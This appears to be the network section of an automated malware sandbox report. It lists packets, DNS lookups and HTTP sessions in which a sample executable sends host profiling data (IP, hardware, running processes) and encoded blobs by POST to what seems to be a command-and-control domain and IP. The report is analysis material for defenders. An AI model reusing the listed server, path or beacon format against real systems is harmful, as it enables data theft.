                                                              Dec 20, 2024 16:41:24.524322033 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524368048 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524493933 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524502993 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524633884 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524704933 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.524713993 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525269985 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525279999 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525289059 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525299072 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525309086 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525321007 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525330067 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525338888 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525347948 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525360107 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525368929 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.525378942 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.611218929 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:24.611629009 CET8049803147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:25.224332094 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:25.344242096 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:25.344481945 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:25.344901085 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:25.464637041 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:26.724858999 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:26.724889994 CET8049809147.45.113.159192.168.2.5
                                                              Dec 20, 2024 16:41:26.725033998 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:26.725392103 CET4980980192.168.2.5147.45.113.159
                                                              Dec 20, 2024 16:41:26.844886065 CET8049809147.45.113.159192.168.2.5

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 20, 2024 16:40:45.633325100 CET6410853192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:40:45.633418083 CET6410853192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:40:45.771054983 CET53641081.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:40:45.771100998 CET53641081.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:40:48.779617071 CET5757253192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:40:48.779715061 CET5757253192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:40:48.917088032 CET53575721.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:40:48.917130947 CET53575721.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:41:22.570550919 CET5921953192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:41:22.570663929 CET5921953192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:41:22.709176064 CET53592191.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:41:22.990925074 CET53592191.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:41:25.083064079 CET5922153192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:41:25.083242893 CET5922153192.168.2.51.1.1.1
                                                              Dec 20, 2024 16:41:25.222929001 CET53592211.1.1.1192.168.2.5
                                                              Dec 20, 2024 16:41:25.222946882 CET53592211.1.1.1192.168.2.5

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 20, 2024 16:40:45.633325100 CET192.168.2.51.1.1.10xcc01Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:40:45.633418083 CET192.168.2.51.1.1.10xb3a9Standard query (0)httpbin.org28IN (0x0001)false
                                                              Dec 20, 2024 16:40:48.779617071 CET192.168.2.51.1.1.10x4b4bStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:40:48.779715061 CET192.168.2.51.1.1.10xf5ceStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                              Dec 20, 2024 16:41:22.570550919 CET192.168.2.51.1.1.10x2278Standard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:41:22.570663929 CET192.168.2.51.1.1.10x5dcStandard query (0)home.twentytk20pn.top28IN (0x0001)false
                                                              Dec 20, 2024 16:41:25.083064079 CET192.168.2.51.1.1.10x2eebStandard query (0)home.twentytk20pn.topA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:41:25.083242893 CET192.168.2.51.1.1.10x4972Standard query (0)home.twentytk20pn.top28IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 20, 2024 16:40:45.771100998 CET1.1.1.1192.168.2.50xcc01No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:40:45.771100998 CET1.1.1.1192.168.2.50xcc01No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:40:48.917088032 CET1.1.1.1192.168.2.50x4b4bNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:41:22.709176064 CET1.1.1.1192.168.2.50x2278No error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:41:25.222946882 CET1.1.1.1192.168.2.50x2eebNo error (0)home.twentytk20pn.top147.45.113.159A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • httpbin.org
                                                              • home.twentytk20pn.top

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.549720147.45.113.159803668C:\Users\user\Desktop\f9bcOz8SxR.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 20, 2024 16:40:49.040304899 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                              Host: home.twentytk20pn.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 565156
                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 32 34 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709247", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                              Dec 20, 2024 16:40:49.160023928 CET2472OUTData Raw: 76 34 56 2b 4d 76 42 58 6a 42 6c 75 4c 78 5c 2f 43 6d 49 78 6c 48 45 5a 66 57 39 6c 6d 4f 53 35 76 53 77 32 46 7a 6e 41 78 6b 32 71 47 49 72 59 62 43 34 76 48 55 4a 34 54 46 4a 4e 30 4d 54 68 73 56 58 70 4f 53 6e 52 71 53 70 34 69 6e 55 6f 77 5c
                                                              Data Ascii: v4V+MvBXjBluLx\/CmIxlHEZfW9lmOS5vSw2FznAxk2qGIrYbC4vHUJ4TFJN0MThsVXpOSnRqSp4inUow\/m\/wAY\/ATxB8Cs3weWcaYXA18LmlD22V8QZHWxeNyDMZwjF4nC4fF4vA5diIY3BOajisJisHhqyjKnXpRq4WrSr1KNFWKg2P7fl\/8AZV+rH42JRRRQAVC\/+sjr7Q\/4J\/fCvwH8bf2t\/hT8MPidoQ8S+B\/
                                                              Dec 20, 2024 16:40:49.160155058 CET2472OUTData Raw: 38 64 65 66 38 6e 76 55 4b 64 50 2b 32 51 5c 2f 6d 31 57 6e 36 5c 2f 68 5c 2f 55 31 47 33 2b 72 32 62 50 77 35 5c 2f 7a 78 2b 76 38 67 36 43 48 4a 39 5c 2f 2b 5c 2f 50 5c 2f 41 4e 65 6f 5a 50 38 41 62 5c 2f 65 44 6e 41 71 7a 74 5c 2f 6a 5c 2f 41
                                                              Data Ascii: 8def8nvUKdP+2Q\/m1Wn6\/h\/U1G3+r2bPw5\/zx+v8g6CHJ9\/+\/P\/ANeoZP8Ab\/eDnAqzt\/j\/AB6fjjNM8vp8+z\/J7DFBX\/Ln\/t0qSN5m\/wCcP+9\/5ZA1Hudl2Z\/z9f8AP50\/+\/8AJ8mevm+vf+f86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v\/LQfh9etM+f5X\/1zn\/W\/5\/z2qXnO\/wDe
                                                              Dec 20, 2024 16:40:49.160253048 CET4944OUTData Raw: 41 6d 5c 2f 75 72 6e 5c 2f 55 66 35 39 38 5c 2f 5c 2f 58 71 4a 76 76 4f 6a 76 5c 2f 32 30 5c 2f 43 67 43 42 59 7a 5c 2f 41 41 45 37 78 47 54 35 6b 6e 5c 2f 74 70 61 66 30 5c 2f 4c 48 4e 48 48 5c 2f 54 50 5c 2f 70 72 5c 2f 77 41 38 50 2b 76 71 37
                                                              Data Ascii: Am\/urn\/Uf598\/\/XqJvvOjv\/20\/CgCBYz\/AAE7xGT5kn\/tpaf0\/LHNHH\/TP\/pr\/wA8P+vq7\/Dp\/PFTRxyM2392zx+megqGP5pP7\/l9pPXn+nvWfs\/P8P8AgmlPr8v1GfPHGkaPGP3tz+8\/57fj6+v0xRn+NHkheX975n+ogGf59+Ke0nzMn344\/wB1\/quO\/wDpWfSnyRuuzYn8\/tH17e3\/ANc1maH7
                                                              Dec 20, 2024 16:40:49.160274982 CET2472OUTData Raw: 73 44 36 45 46 54 47 30 4f 45 2b 4f 63 6e 72 5a 6c 48 4d 63 48 6c 50 45 2b 46 6a 67 6c 68 38 5a 50 47 5a 64 52 65 4b 79 39 56 63 56 4c 4c 35 53 74 47 46 4c 45 56 59 78 71 56 46 53 68 43 4d 36 79 6e 55 63 65 65 55 35 53 5c 2f 7a 64 5c 2f 61 46 30
                                                              Data Ascii: sD6EFTG0OE+OcnrZlHMcHlPE+Fjglh8ZPGZdReKy9VcVLL5StGFLEVYxqVFShCM6ynUceeU5S\/zd\/aF0MDU428PM6oZV\/ZuPznhLGSzGVfB0sJmWI+pZl7HCRzL2blKrWw1GcqVJ1alSVOi4Uoy9nGEYx0VJ5fv+n\/16jr+3j\/Pn2nl+P\/AI\/L9\/0\/8Ar1HViig0P7W\/+CbbE\/sNfs6en\/CHakPy8X+JF\/p\/+
                                                              Dec 20, 2024 16:40:49.160367966 CET4944OUTData Raw: 50 38 2b 74 56 63 50 6a 64 5c 2f 46 39 4f 2b 4f 76 72 31 39 73 39 36 6c 6b 37 66 36 7a 76 5c 2f 53 6d 79 4b 5c 2f 4b 64 65 66 39 5a 5c 2f 6e 39 4f 76 38 41 4f 67 36 2b 64 2b 58 39 66 4d 72 38 35 33 37 50 2b 32 65 50 33 48 5c 2f 36 76 38 35 7a 55
                                                              Data Ascii: P8+tVcPjd\/F9O+Ovr19s96lk7f6zv\/SmyK\/Kdef9Z\/n9Ov8AOg6+d+X9fMr8537P+2eP3H\/6v85zUHyfP\/rO\/wBP8\/0x2zVzyc\/6whv5fpVaSP72\/wC\/x6f5+uKDUh9ET\/ln\/qv8\/wD6vbimAO33U8w\/Uj9an2v\/ALnP+r\/5b9PbPWoPLf5P48f5H6fT9c0HQHlp\/Gkaf8te4n6VTZfm\/wBj\/pp+4t\
                                                              Dec 20, 2024 16:40:49.160458088 CET2472OUTData Raw: 6e 7a 72 39 71 6e 78 44 6f 58 69 58 39 6b 66 39 71 33 55 66 44 32 73 36 58 72 75 6e 6a 77 42 34 6d 74 7a 66 36 52 66 32 32 70 57 4a 6e 54 34 66 65 48 35 4a 49 6b 76 4c 4f 53 61 33 6b 65 4e 5a 59 5c 2f 4d 43 53 4e 73 5a 74 72 59 63 4d 6f 5c 2f 64
                                                              Data Ascii: nzr9qnxDoXiX9kf9q3UfD2s6XrunjwB4mtzf6Rf22pWJnT4feH5JIkvLOSa3keNZY\/MCSNsZtrYcMo\/dOH\/AGM\/FDJcRl7r1MBX8QsJLD1506lOVbL6vEn1jBzrRlCm4+1hLD1rThB80oe6nZHicVYKnT8MOJcTj8PhKefUvC7NcBiZQnTnOnVw\/DuK+s4WlOM5qdOhiZYtLknNa1HzSV2fxvYP93\/0L\/Gm1YpmX9B\/
                                                              Dec 20, 2024 16:40:49.160514116 CET2472OUTData Raw: 46 31 4a 76 4c 4a 4a 79 63 61 63 59 51 57 69 57 6b 59 70 65 52 5c 2f 6d 37 2b 30 5a 77 39 48 43 63 58 2b 47 4f 47 77 31 4e 55 71 46 48 68 54 4e 6f 55 71 61 63 6d 6f 52 57 62 77 73 6b 35 4e 79 65 5c 2f 56 74 6c 65 69 70 4a 4f 33 34 31 48 58 39 30
                                                              Data Ascii: F1JvLJJycacYQWiWkYpeR\/m7+0Zw9HCcX+GOGw1NUqFHhTNoUqacmoRWbwsk5Nye\/VtleipJO341HX90H+dYVXqxUT9fw\/qaAP6IPFfw18c+Ov+CPn7Nfjb4bac+ueNv2cvF\/h\/wDaO0PQIojPLrQ+Gvj34hW+rW0duqs12bHQdd1XW2skDT3iaU9raRT3s1vby\/Xvxz+FHwp\/4Ky\/ss\/DTxv8KvibL4O1zR9asPHn
                                                              Dec 20, 2024 16:40:49.160638094 CET2472OUTData Raw: 2b 52 32 37 66 68 54 50 6e 2b 2b 69 62 5c 2f 77 44 70 33 5c 2f 41 66 6d 66 36 63 55 34 66 63 6a 5c 2f 38 41 61 6e 5c 2f 48 78 5c 2f 6e 31 70 70 2b 38 37 38 37 34 5c 2f 77 42 31 35 6e 2b 63 6e 6b 5c 2f 53 67 50 61 5c 2f 33 76 77 5c 2f 34 42 42 74
                                                              Data Ascii: +R27fhTPn++ib\/wDp3\/Afmf6cU4fcj\/8Aan\/Hx\/n1pp+87874\/wB15n+cnk\/SgPa\/3vw\/4BBt8tt\/\/bKKP\/P+e\/pUXlpH+5dP\/wBXf+g\/wq1JJ99B8\/ceZL+44\/z3\/pUDbPM+dJX\/AHQ83\/6\/Jx\/Q1p7Pz\/D\/AIJ0DJPJ\/gTf5f8An29P5+lQybG3v9zzJTiTp+X+TmptqbU+WR3z1j\/zx\/8
                                                              Dec 20, 2024 16:40:49.279733896 CET2472OUTData Raw: 74 4c 51 55 39 63 71 79 49 6a 37 33 5c 2f 41 4e 62 35 6b 6b 76 2b 65 63 5a 71 49 74 7a 39 5c 2f 5a 43 5a 66 33 76 5c 2f 41 44 77 7a 6e 5c 2f 50 54 38 76 54 54 32 66 6e 2b 48 5c 2f 42 4f 67 5c 2f 64 32 69 73 54 78 4a 72 31 6e 34 59 30 50 55 74 66
                                                              Data Ascii: tLQU9cqyIj73\/ANb5kkv+ecZqItz9\/ZCZf3v\/ADwzn\/PT8vTT2fn+H\/BOg\/d2isTxJr1n4Y0PUtf1A4stLtzc3B3BcRh1T7xBA5cc4Ndt8U9I0b4V3HxEtJfiv8G\/iHe\/Br4t+HPgh8adJ+G+tfEl9Y+E\/wAQvF+neK9S8Lab4ptviX8JvhjZapp+uJ4G8V2lprvgXUvGOiRajo01le39q91pzXvxGf8AHHCfC2YZT
                                                              Dec 20, 2024 16:40:49.279771090 CET2472OUTData Raw: 66 6f 6a 34 5c 2f 6a 7a 69 66 69 33 4e 36 48 41 63 2b 4e 4d 38 77 74 44 68 62 69 7a 4d 71 2b 46 72 55 70 5a 6a 56 79 7a 50 36 32 52 59 4f 4f 4f 71 4b 68 44 43 66 32 5c 2f 67 73 35 70 34 72 4a 36 65 61 55 5a 55 38 35 6c 52 70 53 77 6c 58 46 56 63
                                                              Data Ascii: foj4\/jzifi3N6HAc+NM8wtDhbizMq+FrUpZjVyzP62RYOOOqKhDCf2\/gs5p4rJ6eaUZU85lRpSwlXFVcDgaCw39BcN4b6bGScDcOZNwxT8RsLwbkeJrcS8NYbAYyjOGAw+YZRg81xUqFFYueKfD2KwGLy\/MKuV4qlVySGNxeHqQwtLMcwmsV+4nxA\/4Kx6V42\/Z3+Inhrwp4e8ZfCr466lL4U1LwprAv9L8d+FkvtK8T+E


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.549803147.45.113.159803668C:\Users\user\Desktop\f9bcOz8SxR.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 20, 2024 16:41:23.112723112 CET12360OUTPOST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1
                                                              Host: home.twentytk20pn.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 565156
                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 32 34 37 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 35 30 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709247", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 50, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 332 }, { "name": "csrss.exe", "pid": 420 }, { "name": "wininit.exe", "pid": 496 }, { "name": "csrss.exe", "pid": 504 }, { "name": "winlogon.exe", "pid": 564 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 640 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 992 }, { "name": "svchost.exe", "pid": 444 }, { "name": "svchost.exe", "pid": 732 }, { "name": "svchost.exe", "pid": 280 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                              Dec 20, 2024 16:41:23.232572079 CET2472OUTData Raw: 76 34 56 2b 4d 76 42 58 6a 42 6c 75 4c 78 5c 2f 43 6d 49 78 6c 48 45 5a 66 57 39 6c 6d 4f 53 35 76 53 77 32 46 7a 6e 41 78 6b 32 71 47 49 72 59 62 43 34 76 48 55 4a 34 54 46 4a 4e 30 4d 54 68 73 56 58 70 4f 53 6e 52 71 53 70 34 69 6e 55 6f 77 5c
                                                              Data Ascii: v4V+MvBXjBluLx\/CmIxlHEZfW9lmOS5vSw2FznAxk2qGIrYbC4vHUJ4TFJN0MThsVXpOSnRqSp4inUow\/m\/wAY\/ATxB8Cs3weWcaYXA18LmlD22V8QZHWxeNyDMZwjF4nC4fF4vA5diIY3BOajisJisHhqyjKnXpRq4WrSr1KNFWKg2P7fl\/8AZV+rH42JRRRQAVC\/+sjr7Q\/4J\/fCvwH8bf2t\/hT8MPidoQ8S+B\/
                                                              Dec 20, 2024 16:41:23.232625008 CET2472OUTData Raw: 38 64 65 66 38 6e 76 55 4b 64 50 2b 32 51 5c 2f 6d 31 57 6e 36 5c 2f 68 5c 2f 55 31 47 33 2b 72 32 62 50 77 35 5c 2f 7a 78 2b 76 38 67 36 43 48 4a 39 5c 2f 2b 5c 2f 50 5c 2f 41 4e 65 6f 5a 50 38 41 62 5c 2f 65 44 6e 41 71 7a 74 5c 2f 6a 5c 2f 41
                                                              Data Ascii: 8def8nvUKdP+2Q\/m1Wn6\/h\/U1G3+r2bPw5\/zx+v8g6CHJ9\/+\/P\/ANeoZP8Ab\/eDnAqzt\/j\/AB6fjjNM8vp8+z\/J7DFBX\/Ln\/t0qSN5m\/wCcP+9\/5ZA1Hudl2Z\/z9f8AP50\/+\/8AJ8mevm+vf+f86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/kfb5v\/LQfh9etM+f5X\/1zn\/W\/5\/z2qXnO\/wDe
                                                              Dec 20, 2024 16:41:23.232712030 CET4944OUTData Raw: 41 6d 5c 2f 75 72 6e 5c 2f 55 66 35 39 38 5c 2f 5c 2f 58 71 4a 76 76 4f 6a 76 5c 2f 32 30 5c 2f 43 67 43 42 59 7a 5c 2f 41 41 45 37 78 47 54 35 6b 6e 5c 2f 74 70 61 66 30 5c 2f 4c 48 4e 48 48 5c 2f 54 50 5c 2f 70 72 5c 2f 77 41 38 50 2b 76 71 37
                                                              Data Ascii: Am\/urn\/Uf598\/\/XqJvvOjv\/20\/CgCBYz\/AAE7xGT5kn\/tpaf0\/LHNHH\/TP\/pr\/wA8P+vq7\/Dp\/PFTRxyM2392zx+megqGP5pP7\/l9pPXn+nvWfs\/P8P8AgmlPr8v1GfPHGkaPGP3tz+8\/57fj6+v0xRn+NHkheX975n+ogGf59+Ke0nzMn344\/wB1\/quO\/wDpWfSnyRuuzYn8\/tH17e3\/ANc1maH7
                                                              Dec 20, 2024 16:41:23.232815981 CET2472OUTData Raw: 73 44 36 45 46 54 47 30 4f 45 2b 4f 63 6e 72 5a 6c 48 4d 63 48 6c 50 45 2b 46 6a 67 6c 68 38 5a 50 47 5a 64 52 65 4b 79 39 56 63 56 4c 4c 35 53 74 47 46 4c 45 56 59 78 71 56 46 53 68 43 4d 36 79 6e 55 63 65 65 55 35 53 5c 2f 7a 64 5c 2f 61 46 30
                                                              Data Ascii: sD6EFTG0OE+OcnrZlHMcHlPE+Fjglh8ZPGZdReKy9VcVLL5StGFLEVYxqVFShCM6ynUceeU5S\/zd\/aF0MDU428PM6oZV\/ZuPznhLGSzGVfB0sJmWI+pZl7HCRzL2blKrWw1GcqVJ1alSVOi4Uoy9nGEYx0VJ5fv+n\/16jr+3j\/Pn2nl+P\/AI\/L9\/0\/8Ar1HViig0P7W\/+CbbE\/sNfs6en\/CHakPy8X+JF\/p\/+
                                                              Dec 20, 2024 16:41:23.232863903 CET2472OUTData Raw: 50 38 2b 74 56 63 50 6a 64 5c 2f 46 39 4f 2b 4f 76 72 31 39 73 39 36 6c 6b 37 66 36 7a 76 5c 2f 53 6d 79 4b 5c 2f 4b 64 65 66 39 5a 5c 2f 6e 39 4f 76 38 41 4f 67 36 2b 64 2b 58 39 66 4d 72 38 35 33 37 50 2b 32 65 50 33 48 5c 2f 36 76 38 35 7a 55
                                                              Data Ascii: P8+tVcPjd\/F9O+Ovr19s96lk7f6zv\/SmyK\/Kdef9Z\/n9Ov8AOg6+d+X9fMr8537P+2eP3H\/6v85zUHyfP\/rO\/wBP8\/0x2zVzyc\/6whv5fpVaSP72\/wC\/x6f5+uKDUh9ET\/ln\/qv8\/wD6vbimAO33U8w\/Uj9an2v\/ALnP+r\/5b9PbPWoPLf5P48f5H6fT9c0HQHlp\/Gkaf8te4n6VTZfm\/wBj\/pp+4t\
                                                              Dec 20, 2024 16:41:23.232960939 CET2472OUTData Raw: 5c 2f 35 5a 58 48 48 6c 48 5c 2f 44 4e 4d 32 76 38 6e 6c 5c 2f 38 38 76 4e 5c 2f 35 34 54 5c 2f 41 4a 5c 2f 5c 2f 41 46 2b 6c 41 44 50 4c 38 79 52 48 2b 5c 2f 38 41 76 66 38 41 6a 34 6a 50 72 30 75 76 7a 5c 2f 70 30 70 6e 7a 77 78 77 66 36 7a 5a
                                                              Data Ascii: \/5ZXHHlH\/DNM2v8nl\/88vN\/54T\/AJ\/\/AF+lADPL8yRH+\/8Avf8Aj4jPr0uvz\/p0pnzwxwf6zZ\/pHleX\/wBfX4\/bf857VJJsjkm+SNE8rn\/PXmiOQx7HRNn7ryuIv3+PtX4\/\/XzQBH8\/mTTJ9y4\/6ZcfaB0\/0Tt+femNG\/yIM\/8ALx52f8\/Xj60+Tftx+8fzP3UUkfcf59v1p8f7z7j70\/0iWYyc\/
                                                              Dec 20, 2024 16:41:23.232986927 CET4944OUTData Raw: 6e 7a 72 39 71 6e 78 44 6f 58 69 58 39 6b 66 39 71 33 55 66 44 32 73 36 58 72 75 6e 6a 77 42 34 6d 74 7a 66 36 52 66 32 32 70 57 4a 6e 54 34 66 65 48 35 4a 49 6b 76 4c 4f 53 61 33 6b 65 4e 5a 59 5c 2f 4d 43 53 4e 73 5a 74 72 59 63 4d 6f 5c 2f 64
                                                              Data Ascii: nzr9qnxDoXiX9kf9q3UfD2s6XrunjwB4mtzf6Rf22pWJnT4feH5JIkvLOSa3keNZY\/MCSNsZtrYcMo\/dOH\/AGM\/FDJcRl7r1MBX8QsJLD1506lOVbL6vEn1jBzrRlCm4+1hLD1rThB80oe6nZHicVYKnT8MOJcTj8PhKefUvC7NcBiZQnTnOnVw\/DuK+s4WlOM5qdOhiZYtLknNa1HzSV2fxvYP93\/0L\/Gm1YpmX9B\/
                                                              Dec 20, 2024 16:41:23.233289957 CET2472OUTData Raw: 2b 52 32 37 66 68 54 50 6e 2b 2b 69 62 5c 2f 77 44 70 33 5c 2f 41 66 6d 66 36 63 55 34 66 63 6a 5c 2f 38 41 61 6e 5c 2f 48 78 5c 2f 6e 31 70 70 2b 38 37 38 37 34 5c 2f 77 42 31 35 6e 2b 63 6e 6b 5c 2f 53 67 50 61 5c 2f 33 76 77 5c 2f 34 42 42 74
